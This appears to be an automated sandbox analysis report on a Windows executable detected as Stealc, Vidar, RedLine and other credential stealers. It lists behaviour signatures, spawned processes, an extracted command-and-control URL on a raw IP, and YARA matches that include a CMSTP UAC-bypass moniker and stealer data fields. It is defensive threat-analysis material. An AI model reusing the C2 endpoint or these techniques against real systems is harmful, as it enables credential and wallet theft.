Edit tour

Windows Analysis Report
zLwT7vCojz.exe

Overview

General Information

Sample name:	zLwT7vCojz.exe renamed because original name is a hash value
Original sample name:	577592f54bb4b19d416913b1816f7971.exe
Analysis ID:	1430197
MD5:	577592f54bb4b19d416913b1816f7971
SHA1:	b36d64d5c46982f85c890d129c439a678299d11e
SHA256:	1e9f56f3709d1ecef0ebd00e173acf65f93d84439647a193ae558728dddff327
Tags:	exeStealc
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mars stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected UAC Bypass using CMSTP

Yara detected Vidar stealer

Yara detected zgRAT

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking locale)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Use Short Name Path in Command Line

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

zLwT7vCojz.exe (PID: 5496 cmdline: "C:\Users\user\Desktop\zLwT7vCojz.exe" MD5: 577592F54BB4B19D416913B1816F7971)

u48o.0.exe (PID: 3912 cmdline: "C:\Users\user~1\AppData\Local\Temp\u48o.0.exe" MD5: 65A31455A497CAEE44C5AA749C50E40B)

WerFault.exe (PID: 8032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 2020 MD5: C31336C1EFC2CCB44B4326EA793040F2)

Qg_Appv5.exe (PID: 2688 cmdline: "C:\Users\user~1\AppData\Local\Temp\Qg_Appv5.exe" MD5: 54D53F5BDB925B3ED005A84B5492447F)

UniversalInstaller.exe (PID: 7176 cmdline: C:\Users\user~1\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

UniversalInstaller.exe (PID: 7228 cmdline: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 7404 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7996 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

u48o.1.exe (PID: 648 cmdline: "C:\Users\user~1\AppData\Local\Temp\u48o.1.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)

SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (PID: 7808 cmdline: "C:\Users\user~1\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 MD5: 8E9C467EAC35B35DA1F586014F29C330)

WerFault.exe (PID: 5916 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 1476 MD5: C31336C1EFC2CCB44B4326EA793040F2)

UniversalInstaller.exe (PID: 1920 cmdline: "C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 1180 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 6420 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: StealC

{"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}

Threatname: Vidar

{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\wyftaheq	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\wyftaheq	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\wyftaheq	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb823a:$s14: keybd_event 0xbef6f:$v1_1: grabber@ 0xb8e03:$v1_2: <BrowserProfile>k__ 0xb987c:$v1_3: <SystemHardwares>k__ 0xb993b:$v1_5: <ScannedWallets>k__ 0xb99cb:$v1_6: <DicrFiles>k__ 0xb99a7:$v1_7: <MessageClientFiles>k__ 0xb9d71:$v1_8: <ScanBrowsers>k__BackingField 0xb9dc3:$v1_8: <ScanWallets>k__BackingField 0xb9de0:$v1_8: <ScanScreen>k__BackingField 0xb9e1a:$v1_8: <ScanVPN>k__BackingField 0xab6aa:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xaafb6:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\pfswlxy	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\pfswlxy	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\pfswlxy	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb823a:$s14: keybd_event 0xbef6f:$v1_1: grabber@ 0xb8e03:$v1_2: <BrowserProfile>k__ 0xb987c:$v1_3: <SystemHardwares>k__ 0xb993b:$v1_5: <ScannedWallets>k__ 0xb99cb:$v1_6: <DicrFiles>k__ 0xb99a7:$v1_7: <MessageClientFiles>k__ 0xb9d71:$v1_8: <ScanBrowsers>k__BackingField 0xb9dc3:$v1_8: <ScanWallets>k__BackingField 0xb9de0:$v1_8: <ScanScreen>k__BackingField 0xb9e1a:$v1_8: <ScanVPN>k__BackingField 0xab6aa:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xaafb6:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\u48o.1.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0000001E.00000002.1802561648.0000000003DE5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000016.00000002.1714070421.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.1714070421.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000000.1354291806.0000000000401000.00000020.00000001.01000000.0000000B.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000000.00000003.1362288506.0000000006B8B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000000.00000002.1558366239.00000000043AD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x8a0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000A.00000002.1688142273.0000000004082000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.2498896890.00000000006CB000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000A.00000002.1687815536.000000000406C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1580:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001F.00000002.2051122015.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.2051122015.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001F.00000002.2050713251.00000000054D7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001B.00000002.2522072387.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001A.00000000.1530072053.00000256544FB000.00000002.00000001.01000000.00000018.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: u48o.0.exe PID: 3912	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: u48o.0.exe PID: 3912	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: u48o.0.exe PID: 3912	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: UniversalInstaller.exe PID: 7176	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: UniversalInstaller.exe PID: 7228	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 7404	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7404	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.3.u48o.0.exe.5cc0000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
10.3.u48o.0.exe.5cc0000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
22.2.cmd.exe.52f0e64.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
22.2.cmd.exe.52f0e64.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d108:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d193:$s1: CoGetObject 0x1d0ec:$s2: Elevation:Administrator!new:
10.2.u48o.0.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
10.2.u48o.0.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
22.2.cmd.exe.52f0264.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
22.2.cmd.exe.52f0264.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd08:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd93:$s1: CoGetObject 0x1dcec:$s2: Elevation:Administrator!new:
18.2.UniversalInstaller.exe.43e9d5b.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
18.2.UniversalInstaller.exe.43e9d5b.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d108:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d193:$s1: CoGetObject 0x1d0ec:$s2: Elevation:Administrator!new:
30.2.UniversalInstaller.exe.3e3015b.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
30.2.UniversalInstaller.exe.3e3015b.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd08:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd93:$s1: CoGetObject 0x1dcec:$s2: Elevation:Administrator!new:
31.2.cmd.exe.54dd976.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
31.2.cmd.exe.54dd976.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615f6:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61681:$s1: CoGetObject 0x615da:$s2: Elevation:Administrator!new:
31.2.cmd.exe.5ac00c8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
31.2.cmd.exe.5ac00c8.7.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.2.cmd.exe.5ac00c8.7.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb823a:$s14: keybd_event 0xbef6f:$v1_1: grabber@ 0xb8e03:$v1_2: <BrowserProfile>k__ 0xb987c:$v1_3: <SystemHardwares>k__ 0xb993b:$v1_5: <ScannedWallets>k__ 0xb99cb:$v1_6: <DicrFiles>k__ 0xb99a7:$v1_7: <MessageClientFiles>k__ 0xb9d71:$v1_8: <ScanBrowsers>k__BackingField 0xb9dc3:$v1_8: <ScanWallets>k__BackingField 0xb9de0:$v1_8: <ScanScreen>k__BackingField 0xb9e1a:$v1_8: <ScanVPN>k__BackingField 0xab6aa:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xaafb6:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25659b50000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256726b0000.10.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256726b0000.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
22.2.cmd.exe.52ac976.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
22.2.cmd.exe.52ac976.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615f6:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61681:$s1: CoGetObject 0x615da:$s2: Elevation:Administrator!new:
22.2.cmd.exe.5ba00c8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
22.2.cmd.exe.5ba00c8.7.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
22.2.cmd.exe.5ba00c8.7.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb823a:$s14: keybd_event 0xbef6f:$v1_1: grabber@ 0xb8e03:$v1_2: <BrowserProfile>k__ 0xb987c:$v1_3: <SystemHardwares>k__ 0xb993b:$v1_5: <ScannedWallets>k__ 0xb99cb:$v1_6: <DicrFiles>k__ 0xb99a7:$v1_7: <MessageClientFiles>k__ 0xb9d71:$v1_8: <ScanBrowsers>k__BackingField 0xb9dc3:$v1_8: <ScanWallets>k__BackingField 0xb9de0:$v1_8: <ScanScreen>k__BackingField 0xb9e1a:$v1_8: <ScanVPN>k__BackingField 0xab6aa:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xaafb6:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
31.2.cmd.exe.5ac00c8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
31.2.cmd.exe.5ac00c8.7.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.2.cmd.exe.5ac00c8.7.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb643a:$s14: keybd_event 0xbd16f:$v1_1: grabber@ 0xb7003:$v1_2: <BrowserProfile>k__ 0xb7a7c:$v1_3: <SystemHardwares>k__ 0xb7b3b:$v1_5: <ScannedWallets>k__ 0xb7bcb:$v1_6: <DicrFiles>k__ 0xb7ba7:$v1_7: <MessageClientFiles>k__ 0xb7f71:$v1_8: <ScanBrowsers>k__BackingField 0xb7fc3:$v1_8: <ScanWallets>k__BackingField 0xb7fe0:$v1_8: <ScanScreen>k__BackingField 0xb801a:$v1_8: <ScanVPN>k__BackingField 0xa98aa:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa91b6:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
31.2.cmd.exe.5521e64.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
31.2.cmd.exe.5521e64.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d108:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d193:$s1: CoGetObject 0x1d0ec:$s2: Elevation:Administrator!new:
26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25659b50000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.u48o.0.exe.5c90e67.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
10.2.u48o.0.exe.5c90e67.1.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
10.2.u48o.0.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
10.2.u48o.0.exe.400000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
18.2.UniversalInstaller.exe.43e915b.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
18.2.UniversalInstaller.exe.43e915b.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd08:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd93:$s1: CoGetObject 0x1dcec:$s2: Elevation:Administrator!new:
20.2.UniversalInstaller.exe.36f286d.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.UniversalInstaller.exe.36f286d.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615f6:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61681:$s1: CoGetObject 0x615da:$s2: Elevation:Administrator!new:
20.2.UniversalInstaller.exe.373615b.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.UniversalInstaller.exe.373615b.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd08:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd93:$s1: CoGetObject 0x1dcec:$s2: Elevation:Administrator!new:
